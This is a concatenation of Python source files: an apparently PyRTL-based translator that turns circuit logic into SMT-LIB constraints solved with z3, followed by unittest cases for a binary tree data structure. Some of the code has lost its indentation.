log_net.op_param[1].name, log_net.op_param[1].addrwidth,
log_net.op_param[1].bitwidth))
if log_net.dests[0].name not in Declare:
output_file.write(
"(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
output_file.write("(assert (= (select %s %s) %s))\n" % (
log_net.op_param[1].name, log_net.args[0].name, log_net.dests[0].name))
# node_cntr += 1
elif log_net.op == '@':  # memory write
if log_net.op_param[1].name not in initializedMem:
initializedMem.append(log_net.op_param[1].name)
output_file.write("(declare-const %s (Array (_ BitVec %s) (_ BitVec %s)))\n" % (
log_net.op_param[1].name, log_net.op_param[1].addrwidth,
log_net.op_param[1].bitwidth))
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
if log_net.args[2].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[2].name, log_net.args[2].bitwidth))
Declare.append(log_net.args[2].name)
output_file.write("(assert (ite (= %s #b1) (= (store %s %s %s) %s) (= %s %s)))\n" % (log_net.args[2].name, log_net.op_param[1].name, log_net.args[0].name, log_net.args[1].name, log_net.op_param[1].name, log_net.op_param[1].name, log_net.op_param[1].name))
# node_cntr += 1
else:
pass
else:
for cir in range(0, circle):
for log_net in list(block.logic_subset()):
if log_net.op == '&':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (bvand %s_%s %s_%s)))\n" % (log_net.dests[0].name, cir, log_net.args[0].name, cir, log_net.args[1].name, cir))
elif log_net.op == '|':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (bvor %s_%s %s_%s)))\n" % (log_net.dests[0].name, cir, log_net.args[0].name, cir, log_net.args[1].name, cir))
elif log_net.op == '^':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (bvxor %s_%s %s_%s)))\n" % (log_net.dests[0].name, cir, log_net.args[0].name, cir, log_net.args[1].name, cir))
elif log_net.op == 'n':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (bvnand %s_%s %s_%s)))\n" % (log_net.dests[0].name, cir, log_net.args[0].name, cir, log_net.args[1].name, cir))
elif log_net.op == '~':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (bvnot %s_%s)))\n" % (log_net.dests[0].name, cir, log_net.args[0].name, cir))
elif log_net.op == '+':
a = ''
for i in range(0, 2):
if (log_net.args[i].name in consts) and (log_net.args[i].signed):
a = a + " (concat #b1 " + log_net.args[i].name + '_' + str(cir) + ") "
else:
a = a + " ((_ zero_extend 1) " + log_net.args[i].name + '_' + str(cir) + ") "
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (bvadd %s)))\n" % (log_net.dests[0].name, cir, a))
elif log_net.op == '-':
sub = ''
for i in range(0, 2):
if (log_net.args[i].name in consts) and (log_net.args[i].signed):
sub = sub + " (concat #b1 " + log_net.args[i].name + '_' + str(cir) + ") "
else:
sub = sub + " ((_ zero_extend 1) " + log_net.args[i].name + '_' + str(cir) + ") "
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (bvsub %s)))\n" % (log_net.dests[0].name, cir, sub))
elif log_net.op == '*':
mul = ''
for i in range(0, 2):
if (log_net.args[i].name in consts) and (log_net.args[i].signed):
mu = ''
for j in range(0, log_net.args[i].bitwidth):
mu = mu + '1'
mul = mul + " (concat #b" + mu + " " + log_net.args[i].name + '_' + str(cir) + ") "
else:
mul = mul + " ((_ zero_extend " + str(log_net.args[i].bitwidth) + ") " + log_net.args[
i].name + '_' + str(cir) + ") "
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (bvmul %s)))\n" % (log_net.dests[0].name, cir, mul))
elif log_net.op == '=':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (ite (= %s_%s %s_%s) (= %s_%s #b1) (= %s_%s #b0)))\n" % (log_net.args[0].name, cir, log_net.args[1].name, cir, log_net.dests[0].name, cir,
log_net.dests[0].name, cir))
elif log_net.op == '<':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
                    Declare.append(log_net.dests[0].name + '_' + str(cir))
                if log_net.args[0].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.args[0].name, cir, log_net.args[0].bitwidth))
                    Declare.append(log_net.args[0].name + '_' + str(cir))
                if log_net.args[1].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.args[1].name, cir, log_net.args[1].bitwidth))
                    Declare.append(log_net.args[1].name + '_' + str(cir))
                output_file.write("(assert (ite (bvult %s_%s %s_%s) (= %s_%s #b1) (= %s_%s #b0)))\n" % (
                    log_net.args[0].name, cir, log_net.args[1].name, cir,
                    log_net.dests[0].name, cir, log_net.dests[0].name, cir))
            elif log_net.op == '>':
                if log_net.dests[0].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
                    Declare.append(log_net.dests[0].name + '_' + str(cir))
                if log_net.args[0].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.args[0].name, cir, log_net.args[0].bitwidth))
                    Declare.append(log_net.args[0].name + '_' + str(cir))
                if log_net.args[1].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.args[1].name, cir, log_net.args[1].bitwidth))
                    Declare.append(log_net.args[1].name + '_' + str(cir))
                output_file.write("(assert (ite (bvugt %s_%s %s_%s) (= %s_%s #b1) (= %s_%s #b0)))\n" % (
                    log_net.args[0].name, cir, log_net.args[1].name, cir,
                    log_net.dests[0].name, cir, log_net.dests[0].name, cir))
            elif log_net.op == 'w':
                if log_net.dests[0].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
                    Declare.append(log_net.dests[0].name + '_' + str(cir))
                if log_net.args[0].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.args[0].name, cir, log_net.args[0].bitwidth))
                    Declare.append(log_net.args[0].name + '_' + str(cir))
                output_file.write("(assert (= %s_%s %s_%s))\n" % (log_net.dests[0].name, cir, log_net.args[0].name, cir))
            elif log_net.op == 'x':
                if log_net.dests[0].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
                    Declare.append(log_net.dests[0].name + '_' + str(cir))
                if log_net.args[0].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.args[0].name, cir, log_net.args[0].bitwidth))
                    Declare.append(log_net.args[0].name + '_' + str(cir))
                if log_net.args[1].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.args[1].name, cir, log_net.args[1].bitwidth))
                    Declare.append(log_net.args[1].name + '_' + str(cir))
                if log_net.args[2].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.args[2].name, cir, log_net.args[2].bitwidth))
                    Declare.append(log_net.args[2].name + '_' + str(cir))
                output_file.write("(assert (ite (= %s_%s #b0) (= %s_%s %s_%s) (= %s_%s %s_%s)))\n" % (
                    log_net.args[0].name, cir, log_net.dests[0].name, cir, log_net.args[1].name, cir,
                    log_net.dests[0].name, cir, log_net.args[2].name, cir))
            elif log_net.op == 'c':
                if log_net.dests[0].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
                    Declare.append(log_net.dests[0].name + '_' + str(cir))
                c = ''
                for i in range(len(log_net.args)):
                    if log_net.args[i].name + '_' + str(cir) not in Declare:
                        output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                            log_net.args[i].name, str(cir), log_net.args[i].bitwidth))
                        Declare.append(log_net.args[i].name + '_' + str(cir))
                    c = c + ' ' + log_net.args[i].name + '_' + str(cir)
                output_file.write("(assert (= %s_%s (concat %s)))\n" % (log_net.dests[0].name, str(cir), c))
            elif log_net.op == 's':
                string = ''
                for i in log_net.op_param[::-1]:
                    string = string + "((_ extract " + str(i) + " " + str(i) + ") " + log_net.args[0].name + '_' + str(cir) + ") "
                if log_net.dests[0].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
                    Declare.append(log_net.dests[0].name + '_' + str(cir))
                if log_net.args[0].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.args[0].name, cir, log_net.args[0].bitwidth))
                    Declare.append(log_net.args[0].name + '_' + str(cir))
                output_file.write("(assert (= %s_%s (concat %s)))\n" % (log_net.dests[0].name, cir, string))
            elif log_net.op == 'r':
                if log_net.dests[0].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
                    Declare.append(log_net.dests[0].name + '_' + str(cir))
                if log_net.args[0].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.args[0].name, cir, log_net.args[0].bitwidth))
                    Declare.append(log_net.args[0].name + '_' + str(cir))
                if cir == 0:
                    pass
                else:
                    output_file.write("(assert (= %s_%s %s_%s))\n" % (
                        log_net.dests[0].name, cir, log_net.args[0].name, cir - 1))
            elif log_net.op == 'm':  # 6/2
                # mem.append(log_net.op_param[1].name + "_" + str(cir))
                if log_net.op_param[1].name not in initializedMem:
                    initializedMem.append(log_net.op_param[1].name)
                    output_file.write("(declare-const %s (Array (_ BitVec %s) (_ BitVec %s)))\n" % (
                        log_net.op_param[1].name, log_net.op_param[1].addrwidth,
                        log_net.op_param[1].bitwidth))
                if log_net.dests[0].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
                    Declare.append(log_net.dests[0].name + '_' + str(cir))
                if log_net.args[0].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.args[0].name, cir, log_net.args[0].bitwidth))
                    Declare.append(log_net.args[0].name + '_' + str(cir))
                output_file.write("(assert (= (select %s %s_%s) %s_%s))\n" % (
                    log_net.op_param[1].name, log_net.args[0].name, cir, log_net.dests[0].name, cir))
                # node_cntr += 1
            elif log_net.op == '@':
                if log_net.op_param[1].name not in initializedMem:
                    initializedMem.append(log_net.op_param[1].name)
                    output_file.write("(declare-const %s (Array (_ BitVec %s) (_ BitVec %s)))\n" % (
                        log_net.op_param[1].name, log_net.op_param[1].addrwidth,
                        log_net.op_param[1].bitwidth))
                if log_net.args[0].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.args[0].name, cir, log_net.args[0].bitwidth))
                    Declare.append(log_net.args[0].name + '_' + str(cir))
                if log_net.args[1].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.args[1].name, cir, log_net.args[1].bitwidth))
                    Declare.append(log_net.args[1].name + '_' + str(cir))
                if log_net.args[2].name + '_' + str(cir) not in Declare:
                    output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
                        log_net.args[2].name, cir, log_net.args[2].bitwidth))
                    Declare.append(log_net.args[2].name + '_' + str(cir))
                output_file.write("(assert (ite (= %s_%s #b1) (= (store %s %s_%s %s_%s) %s) (= %s %s)))\n" % (
                    log_net.args[2].name, cir, log_net.op_param[1].name, log_net.args[0].name, cir,
                    log_net.args[1].name, cir, log_net.op_param[1].name,
                    log_net.op_param[1].name, log_net.op_param[1].name))
                # node_cntr += 1
            else:
                pass
    if circle == 1:
        for i in consts:
            if consts[i].signed:
                con = bin(pow(2, consts[i].bitwidth) - consts[i].val)
                zero = ""
                for j in range(0, consts[i].bitwidth - len(con) + 2):
                    zero = zero + "0"
                output_file.write("(assert (= %s (bvneg %s)))\n" % (consts[i].name, "#b" + zero + con[2:]))
            else:
                con = bin(consts[i].val)
                zero = ""
                for j in range(0, consts[i].bitwidth - len(con) + 2):
                    zero = zero + "0"
                output_file.write("(assert (= %s %s))\n" % (consts[i].name, "#b" + zero + con[2:]))
    else:
        for cir in range(0, circle):
            for i in consts:
                if consts[i].signed:
                    con = bin(pow(2, consts[i].bitwidth) - consts[i].val)
                    zero = ""
                    for j in range(0, consts[i].bitwidth - len(con) + 2):
                        zero = zero + "0"
                    output_file.write("(assert (= %s_%s (bvneg %s)))\n" % (consts[i].name, cir, "#b" + zero + con[2:]))
                else:
                    con = bin(consts[i].val)
                    zero = ""
                    for j in range(0, consts[i].bitwidth - len(con) + 2):
                        zero = zero + "0"
                    output_file.write("(assert (= %s_%s %s))\n" % (consts[i].name, cir, "#b" + zero + con[2:]))
    return 0
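The constant-encoding loops above pad `bin(val)` out to the declared bit width before prefixing `#b` (the `+ 2` compensates for Python's `0b` prefix). A minimal standalone sketch of that padding rule, using a hypothetical helper name `to_smt_bv` that is not part of the original module:

```python
def to_smt_bv(val, bitwidth):
    """Render an unsigned integer as an SMT-LIB bit-vector literal, e.g. 5 -> '#b0101'."""
    con = bin(val)  # e.g. '0b101'
    # Same zero count as the range(0, bitwidth - len(con) + 2) loops above:
    zero = "0" * (bitwidth - len(con) + 2)
    return "#b" + zero + con[2:]


if __name__ == '__main__':
    print(to_smt_bv(5, 4))  # #b0101
    print(to_smt_bv(0, 3))  # #b000
```

The helper assumes `val` already fits in `bitwidth` bits, exactly as the original loops do.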
##################################################################
# get inputs for n cycles
##################################################################
def gen_inputs_for_n_cycles(block, n=1):
    inps_cycles = []
    for i in block.wirevector_subset(Input):
        if n == 1:
            inp_cycle = i.name
            inps_cycles.append(inp_cycle)
        else:
            for cycle in range(n):
                inp_cycle = i.name + "_%s" % str(cycle)
                inps_cycles.append(inp_cycle)
    return inps_cycles


def gen_outputs_for_n_cycles(block, n=1):
    otps_cycles = []
    for i in block.wirevector_subset(Output):
        if n == 1:
            otp_cycle = i.name
            otps_cycles.append(otp_cycle)
        else:
            for cycle in range(n):
                otp_cycle = i.name + "_%s" % str(cycle)
                otps_cycles.append(otp_cycle)
    return otps_cycles


def get_value_name(value):
    s = value.split('_')[0:-1]
    if len(s) == 1:
        return s[0]
    else:
        signal = s[0]
        for i in range(1, len(s)):
            signal = signal + '_' + s[i]
        return signal


def get_value_bitwidth(block, value):
    for i in block.wirevector_subset():
        if get_value_name(value) == i.name:
            return i.bitwidth
    print('error: %s is not in block.' % get_value_name(value))
    return 0
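`get_value_name` above strips only the trailing cycle suffix while preserving underscores inside the signal name; behaviorally it matches a one-line join. A small illustrative sketch (hypothetical name `strip_cycle_suffix`, not in the original) — note that, like the original, it assumes the value contains at least one underscore:

```python
def strip_cycle_suffix(value):
    # Equivalent to get_value_name: drop only the final '_<cycle>' component.
    return '_'.join(value.split('_')[:-1])


if __name__ == '__main__':
    print(strip_cycle_suffix('pc_3'))        # pc
    print(strip_cycle_suffix('alu_out_12'))  # alu_out
```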
# mem=[]
# mux={mux1:[name, bitwith],mux2:...}
# mux_clock = {mux1:[0,1,0,1,...], mux2:[1,0,1,0,...]}
# initial_values={a_0:'0', b_0:'1',...}
def solve_smt(block, mux, mux_clock, cycle, initial_values=None, rom_blocks=None):
    inputs = gen_inputs_for_n_cycles(block, cycle)
    with tempfile.TemporaryFile(mode='w+') as output_file:
        translate_to_smt(block, output_file, cycle, rom_blocks)
        for i in mux:
            if cycle == 1:
                output_file.write("(assert (= %s %s))\n" % (mux[i][0], transfer_to_bin(mux_clock[i][0], mux[i][1])))
            else:
                for c in range(0, cycle):
                    output_file.write("(assert (= %s_%s %s))\n" % (mux[i][0], c, transfer_to_bin(mux_clock[i][c], mux[i][1])))
        if initial_values is None:
            for i in block.wirevector_subset(Register):
                output_file.write("(assert (= %s_0 %s))\n" % (i.name, transfer_to_bin(0, i.bitwidth)))
        else:
            for i in initial_values:
                output_file.write("(assert (= %s %s))\n" % (i, transfer_to_bin(initial_values[i], get_value_bitwidth(block, i))))
        output_file.seek(0)
        l = output_file.read()
        inps = dict()
        otps = dict()
        s = z3.Solver()
        s.add(z3.parse_smt2_string(l))
        if s.check() == z3.sat:
            m = s.model()
            for i in range(0, len(m)):
                if m[i].name() in inputs:
                    inps[m[i].name()] = m[m[i]].as_long()
            for i in inputs:
                if i not in inps:
                    # inps[i] = random.randint(0, 2**get_value_bitwidth(block, i) - 1)
                    inps[i] = 0
            # outputs = gen_outputs_for_n_cycles(block, cycle)
            # for i in range(0, len(m)):
            #     if m[i].name() in outputs:
            #         otps[m[i].name()] = m[m[i]].as_long()
            # print(otps)
            # for i in range(0, len(m)):
            #     if m[i].name() in mem:
            #         otps[m[i].name()] = m[m[i]].as_long()
            #     print(otps)
            return inps
        else:
            return {}

##################################################################
# binary_tree/binary_tree_tests.py
# from joaojunior/data_structure (MIT)
##################################################################
from binary_tree import BinaryTree, Item
def create_item(id_, value):
return Item(id_, value)
class TestBinaryTree(unittest.TestCase):
def setUp(self):
self.binary_tree = BinaryTree()
def test_empty_binary_tree(self):
self.assertEqual(0, self.binary_tree.size)
self.assertEqual(None, self.binary_tree.root)
def test_insert_one_item_in_empty_binary_tree(self):
item1 = create_item(1, 1)
self.binary_tree.insert(item1)
self.assertEqual(1, self.binary_tree.size)
self.assertEqual(item1, self.binary_tree.root)
self.assertEqual(None, self.binary_tree.root.left)
self.assertEqual(None, self.binary_tree.root.right)
def test_insert_two_items(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.assertEqual(2, self.binary_tree.size)
self.assertEqual(item1, self.binary_tree.root)
self.assertEqual(item2, self.binary_tree.root.left)
self.assertEqual(None, self.binary_tree.root.right)
def test_insert_three_items(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
item3 = create_item(3, 3)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.binary_tree.insert(item3)
self.assertEqual(3, self.binary_tree.size)
self.assertEqual(item1, self.binary_tree.root)
self.assertEqual(item2, self.binary_tree.root.left)
self.assertEqual(item3, self.binary_tree.root.right)
def test_search_head(self):
item1 = create_item(1, 1)
self.binary_tree.insert(item1)
result = self.binary_tree.search(item1.id_)
self.assertEqual(item1, result)
def test_search_left_child(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
result = self.binary_tree.search(item2.id_)
self.assertEqual(item2, result)
def test_search_right_child(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
item3 = create_item(3, 3)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.binary_tree.insert(item3)
result = self.binary_tree.search(item3.id_)
self.assertEqual(item3, result)
def test_search_in_empty_binary_tree(self):
result = self.binary_tree.search(1)
self.assertEqual(None, result)
def test_search_item_not_exist(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
item3 = create_item(3, 3)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.binary_tree.insert(item3)
result = self.binary_tree.search(4)
self.assertEqual(None, result)
def test_remove_head_with_no_children(self):
item1 = create_item(1, 1)
self.binary_tree.insert(item1)
result = self.binary_tree.remove(item1.id_)
self.assertEqual(1, result.id_)
self.assertEqual(1, result.value)
self.assertEqual(0, self.binary_tree.size)
self.assertEqual(None, self.binary_tree.root)
def test_remove_head_with_one_child(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
result = self.binary_tree.remove(item1.id_)
self.assertEqual(1, result.id_)
self.assertEqual(1, result.value)
self.assertEqual(1, self.binary_tree.size)
self.assertEqual(2, self.binary_tree.root.id_)
self.assertEqual(2, self.binary_tree.root.value)
self.assertEqual(None, self.binary_tree.root.left)
self.assertEqual(None, self.binary_tree.root.right)
def test_remove_head_with_two_children(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
item3 = create_item(3, 3)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.binary_tree.insert(item3)
result = self.binary_tree.remove(item1.id_)
self.assertEqual(1, result.id_)
self.assertEqual(1, result.value)
self.assertEqual(2, self.binary_tree.size)
self.assertEqual(3, self.binary_tree.root.id_)
self.assertEqual(3, self.binary_tree.root.value)
self.assertEqual(2, self.binary_tree.root.left.id_)
self.assertEqual(2, self.binary_tree.root.left.value)
self.assertEqual(None, self.binary_tree.root.right)
def test_remove_leaf(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
item3 = create_item(3, 3)
item4 = create_item(4, 4)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.binary_tree.insert(item3)
self.binary_tree.insert(item4)
result = self.binary_tree.remove(item4.id_)
self.assertEqual(item4, result)
self.assertEqual(3, self.binary_tree.size)
self.assertEqual(item1, self.binary_tree.root)
self.assertEqual(item2, self.binary_tree.root.left)
self.assertEqual(item3, self.binary_tree.root.right)
def test_remove_middle_with_one_child(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
item3 = create_item(3, 3)
item4 = create_item(4, 4)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.binary_tree.insert(item3)
self.binary_tree.insert(item4)
result = self.binary_tree.remove(item2.id_)
self.assertEqual(2, result.id_)
self.assertEqual(2, result.value)
self.assertEqual(2, result.value)
self.assertEqual(3, self.binary_tree.size)
self.assertEqual(item1, self.binary_tree.root)
self.assertEqual(3, self.binary_tree.root.left.id_)
self.assertEqual(3, self.binary_tree.root.left.value)
self.assertEqual(item4, self.binary_tree.root.left.left)
def test_remove_middle_with_two_children(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
item3 = create_item(3, 3)
item4 = create_item(4, 4)
item5 = create_item(5, 5)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.binary_tree.insert(item3)
self.binary_tree.insert(item4)
self.binary_tree.insert(item5)
result = self.binary_tree.remove(item2.id_)
self.assertEqual(2, result.id_)
self.assertEqual(2, result.value)
self.assertEqual(4, self.binary_tree.size)
self.assertEqual(item1, self.binary_tree.root)
self.assertEqual(3, self.binary_tree.root.left.id_)
self.assertEqual(3, self.binary_tree.root.left.value)
self.assertEqual(item4, self.binary_tree.root.left.left)
self.assertEqual(item5, self.binary_tree.root.left.right)
def test_remove_item_not_exist(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
item3 = create_item(3, 3)
item4 = create_item(4, 4)
item5 = create_item(5, 5)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.binary_tree.insert(item3)
self.binary_tree.insert(item4)
self.binary_tree.insert(item5)
result = self.binary_tree.remove(6)
self.assertEqual(None, result)
self.assertEqual(5, self.binary_tree.size)
self.assertEqual(item1, self.binary_tree.root)
self.assertEqual(item2, self.binary_tree.root.left)
self.assertEqual(item3, self.binary_tree.root.right)
self.assertEqual(item4, self.binary_tree.root.left.left)
self.assertEqual(item5, self.binary_tree.root.left.right)
if __name__ == '__main__':
unittest.main()

##################################################################
# test/test_interface.py
